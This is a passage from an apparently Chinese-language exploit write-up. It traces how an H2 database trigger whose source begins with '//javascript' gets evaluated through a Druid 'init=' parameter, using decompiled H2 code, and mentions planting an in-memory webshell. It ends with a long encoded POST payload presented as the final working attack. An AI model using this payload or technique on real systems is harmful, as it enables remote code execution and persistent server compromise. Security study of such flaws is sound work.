然后就会一直运行payload里面的js代码,差点搞得电脑重启。。。debug整了半天,由于对druid不熟,不知道连接h2的细节。。。但是找到了漏洞点,在TriggerObject:
private Trigger loadFromSource() {
SourceCompiler var1 = this.database.getCompiler();
synchronized(var1) {
String var3 = "org.h2.dynamic.trigger." + this.getName();
var1.setSource(var3, this.triggerSource);
Trigger var10000;
try {
if (SourceCompiler.isJavaxScriptSource(this.triggerSource)) {
var10000 = (Trigger)var1.getCompiledScript(var3).eval();//这里
return var10000;
}
...明显有个eval执行js代码。它是怎么进来的捏?
private synchronized void load() {
if (this.triggerCallback == null) {
try {
Session var1 = this.database.getSystemSession();
JdbcConnection var2 = var1.createConnection(false);
Object var3;
if (this.triggerClassName != null) {
var3 = JdbcUtils.loadUserClass(this.triggerClassName).getDeclaredConstructor().newInstance();
} else {
var3 = this.loadFromSource();//这里
}
...然后我找了半天,还是不知道这个load是怎么进来的。在下面这行代码之后直接进到load了:
public ResultWithGeneratedKeys update(Object var1) {
this.recompileIfRequired();
this.setProgress(5);
this.start();
this.session.setLastScopeIdentity(ValueNull.INSTANCE);
this.prepared.checkParameters();
Object var2;
if (var1 != null && !Boolean.FALSE.equals(var1)) {
if (this.prepared instanceof DataChangeStatement && this.prepared.getType() != 58) {
var2 = this.executeUpdateWithGeneratedKeys((DataChangeStatement)this.prepared, var1);
} else {
var2 = new WithKeys(this.prepared.update(), this.session.getDatabase().getResultFactory().create());
}
} else {
var2 = ResultWithGeneratedKeys.of(this.prepared.update());//这里
}
...然后prepared是payload里面init=后面的值。
private static boolean isJavascriptSource(String var0) {
return var0.startsWith("//javascript");
}上面这行代码根据前缀判断是否为js代码,然后最后直接eval。讲道理还是挺蒙的。但是又学了一手新姿势写内存马,太nb了
最终payload:post
operation=aN/9WhvoOLU%3d24Ve7b7Py0RB3XVCS%2bCtug%3d%3d¶ms=aN/9WhvoOLU%3d9bhN7FeEb4ZgpJe7f85ZXdfIf4tDAhlt0TzFmAeOJxVPcFpt9Dz02YhvE4uvDt/vEvY3MZxmRLD7BQxaw%2buc7jlnrM9ixVDg1zT0itdHUhYZsspGx5KmOSpnNXWoAEsVpic7Qh6exaIP2/znEZC3kP643GtK/ZIxLs0rNcxRPjIrjMwcaURT4ue2qBMX7RGO/sG1ddpemBdvr192CYZeXPyIQoFvmG0yKsSm3pQvx1CY6wIQWeJxvRg65a5Hak09Wmm6cjSTuXqg0nYWDaf/mzZU9QQvcywqJIcgmM2Rpk4dXhhp7yGIJsA%2bHi70j%2bQ3fxY8PW6bhuLxSnE0z98UpbrmjuaD2m0ygdqfSNjOGVW4B1Tw/OMVb8XoZm7SpvkOqT6vevSx%2b%2bSI%2b%2b6V0QIOwSoQRpSqMtGFz1TeE0d2NDPnnh%2bLj7z%2bt6ghnH2YusFf2DN9m8AaA6TEZa/gZer47g5mut4CGV0Tm8rzVB9L8ENLWdhMH%2bJ7%2bVk5o5XEKvpmAcbcc/%2b%2bfnHqV6lEXIr/ojcttHMuZdTZke0IkFC52/VE5yNSJ940pyJU05PA5N7YLbvgownivob4wF1SG8JpIB3YeT5oUC0rmmcyaYCB29lJZTYO0YexAXdDxajZIiIvPnKLLK3sKOI%2btRHBx5q%2blk9m5mZubpcwxjq7mOr1%2bMY7dJgfVwSiZxBKx6Ed%2bdmR/%2bPvDwqyQbBnUitK4GY9iMT2oo9JdptZkTcnt7W%2b9g%2b0KlEFd0TMGiXnYlKxq5kjqDQgKxEG2Xcnq7zw%2begn4m4lKx30rdNjPkFgze9dXk/awQREasFtfUGihgLqH%2bOC5G/nJwoMOu4DNhWA3qpc5rBoZ%2bjnBmwd81piMMl2DO/ofAjf3qBgwF353ZW890zfVD0P5uqZhKt1voFJJL23DeRd7ZxU9w39DTpmb52H/IXJ%2b58nfslrV%2bqPMxOhnqYhhouWE70Pbk91Nzq3iBIcyco4YEP0F5l4GSauFW47xviDMX56haaor/AWt0WywFPa7yOeB0PASQ4y9P6GN2y1K0B0/2WwDwM06Pf0UXGVNBCEmdeCDJ9hBQdBl/u3M3PXho26msCCUjf5GKKx9pw8ZfYpAMRHaGBfDzmmPMnCXD28K4tfoQuq5rvzlLZMPRcho20Q1eA8bW/1oNTL68A6ChYIhxIIVHbD48d%2bbObOVYPzkGMRCXZRkza2zCzr3pyiSAtRjPUnGyBpwfTjfAlDt5Qb1ZASrMBcR9jFP5ar/pFKWCTw%2b2Y1p7GmWhot9FrUyPvXJIj6WkXOi3a2%2bKHInGIg2Xy0BHRBjpdBk1n4DH%2bHcTfBbRZxNBqmlvMjB7GLGV5oUaB0N8lbt2ZNndsx9LZYIaqVrlhIAwQ6l8m%2bJm7cViE%2bmmkjRbk8jAX336COZacN84DfP6mgNYIJ8///pajXFQyK6pZUVxMRbXdv8gose/c6IZMyBOpJNgR3D/LIWbHCq4cPoCosWTrvzcKcRwJyCJzoJXyOYTNFOsanM2gCQBHv%2bc50Gzby9PUIALZBL3/TTEuvoJK/XggP9c7SzlJgTANM/NBtketblPOx6h18v1MYpiR4R5uKKe63B6GIdqYXMAvuU%2bvDW4xEeBrEztnRsPKE4dV8CkQjxZEVCtyQ1xedHP718ttbW/E8tQ76mFZZCK9FsV73JQV7du4fhzcFId4lfHOrRa03m%2bDgecrtcHv%2bHE6g1fXm57unbWMTR6QYg95DnPhkMhjb%2bbSOBYAwITHYXmw3wSmU739jJynZN/uVY%2bJ5mIOj2HuUOFBgde1EbMXcmf7m4tnGqkrBrA5VU7WsCOPUzSO3eoTGHOHIcasBAPLMIfNy44clRa/jheML3SdFnWCulSBPm1F3SvqE3WSSF9rVsJjgB86bQF5ASoPxXk%2b25a7hgi%2b5aeYaj9roUafIsWxEl2BRGcHunOPOhRqYEDr3GoVpAe2O7X09Qoj/vgz3guFwotSglrUF/WhySYScwZQ4DU2V3W3pfhRUi0GgJAUPVBEBInJfEytswgFsSqd6nqm7TkJ/Z5lkCIRXa8ltfn0a4tI3P3ZInzFkdRKliPpQAo6miMp3V7ID%2bfHy/ljWZIzmFEEgLxbontMxsX%2bAwpBsedOgaOXopaToPfZr%2bDyuT1wqp2je6pLvxlP1PSuZx6PY2X61ujzziATBhXL5agSX3xieHbonNnFvRANsLpmHjXGuTMyElLCwg6XiQPUzDKLiFFaQNTTO11IS/xa/XoGP0DFB2xvcRgzZ0cWH0K0SSXcI8FCBH7AFPz4EsRMO2sba%2bKOHtUDNBkjXu/H4kQfDzjfaN5pGjyAbWS%2bRVYbCKiYySsVTqB1Ql4lJjzu6VliBwzH/CornUZf8hMmh3JeoqUNgJdpyTMAoSMRjS1iv52Q59fSIapThOSWuuh2b2Xshz6%2bcSdaZaVGE4E6SXlo5Q1vebhHNLKMigN1LLJ1EudZjliFQjGBzYx6kM7lPIRalES75UGBdy6FAq7NVHZgVYaskHX7iANrFPIAWVKbNrsyv0qG4WWXS5ZFeSaSUsB1KP4BQi6T6cATH7u0KAdD206kB7C1TDZWhCpIRwVTONDZBqOxvFszDs6%2bnci/Qs8rGZ5KK/Vir1h90pCFlZmWRtaO63ihfbTLvsIKwcsTscwGG40shR8SER5kPwqtQ9kDw3QVrqWirohBwRF7nFevQUeugL6m9o7lqkN9QZOc8EQQJE/%2btl178Vi/EtXHHjOCSBEid5E%2bwoceNkkKlJ50izbOqequpjojyO5w1SABR4FzoW%2bY2lg6O%2bmAJp9HihQfrFETIencjJbdxLBeNZWhJFJZ%2bSrf0OwDMt/r3e91XoIoAZTOeo9yYMUqYHH75fb7FaaCX4YDu9CbI/WEVh7wNTXKk6PGZwh%2bBzs8QFQUeLnuT1pj64eQyy%2b2Owf0OvxcMnyTd9UWdy9gzr7mzw944%2b8GnyElwFpFpjPcJ6TYMtxYk/DcqG2YSOfSRtPL%2bxRM/3i87P7jqyXUql%2bVHFnUE0r4yn5bV2vxq%2bLoVUhMid6vR9HuyE80pAIvyzkHMuMVYsADlPv8tTsiPQMReIqF5o3cM83ntdb92Jb8kw/1aM2sioyzHG%2bOGAplrc7SsAR6%2bq/Lb2GFS18Pcwz8nGRdeyWvt7Wya05YpjNHRtaDt/MYKRIJqtlkKKO/EYF/3ZEDbEXtH%2b0xRpESsMiCjHzds/Smfte1ssGw/3bfms7O8zUuNCJ3exrEuKdDz2IaFwpjsTL9FA4ABUukd6j9FPgd2m9vCtpNTfuOYrpngzsH0DuC5Lku0jQHiHJDyE7AKNNuW/HD3k3VMNbp7S8BrAP89XncV/7vFg5PB5aY/CAtiLkOtuQnN7q6EHj03rQBQ7ZvFLtA0VIzaKX5k4q%2b2DA9onXTSsIVyouX%2beDgmOoTJYfv2QgQ350zeovzc3qpWdNPWttE9Af1w0PGdCh4uESg4DNVtVbsYPvKtLH70S2uxgpz3NYUrTOHzvSXyXSxOTLHucok5fTDHtym6ee00z8inB%2bI%2bWD36oqrqN5A1pI02v0xagW8dvavnkytyeSEz8rfhtGk19lNsHxyveEFK43GCpu7pZjOL%2bhojrs8Bh8KMOmJuGmdljIWXSr5mep7zUDfaXWqkH3te/XHqU3APniEThfivwpgnR7scCMwFdkPgA9BcDk41ZJM4N507tETc6GjfHO8WfJuATiNM76YiHTV11LpeDwTPhFqJ550QeL7tSY2HDy8lsyBcrcMwhB5%2bViaeCjwWKxSvCCEDbP2ePpuGvQEK0QeJFslI6PFyHpmN//wcMYSSmbS1MrqSwv6k29T2fVlFteIn2QPCUQ%2bcFrZONWCvIINcuF5rEY2EpcYyX0LOkBm%2b3wiHHEQILDD0oNrrCt8xTUYbQi3OeEXYSddxICnaLWzqGzrl3YQwJigZEfE05BCTvNOchOI0lFhzi%2besMhFavyyViaAhEnbtyBCrBEN5AO8Oiobx0EOzGVKy8LIvvdI1DEeRoRn3bir18qCQZpM3c/8eKFOlJFUcq0bsgyFABdXg05Fobda0A4XdgRLFiptCSMQab89wDawXMz%2bCaC0lUuzYkziD%2bkrNZHaqIlOVJDFMkZow%3d%3d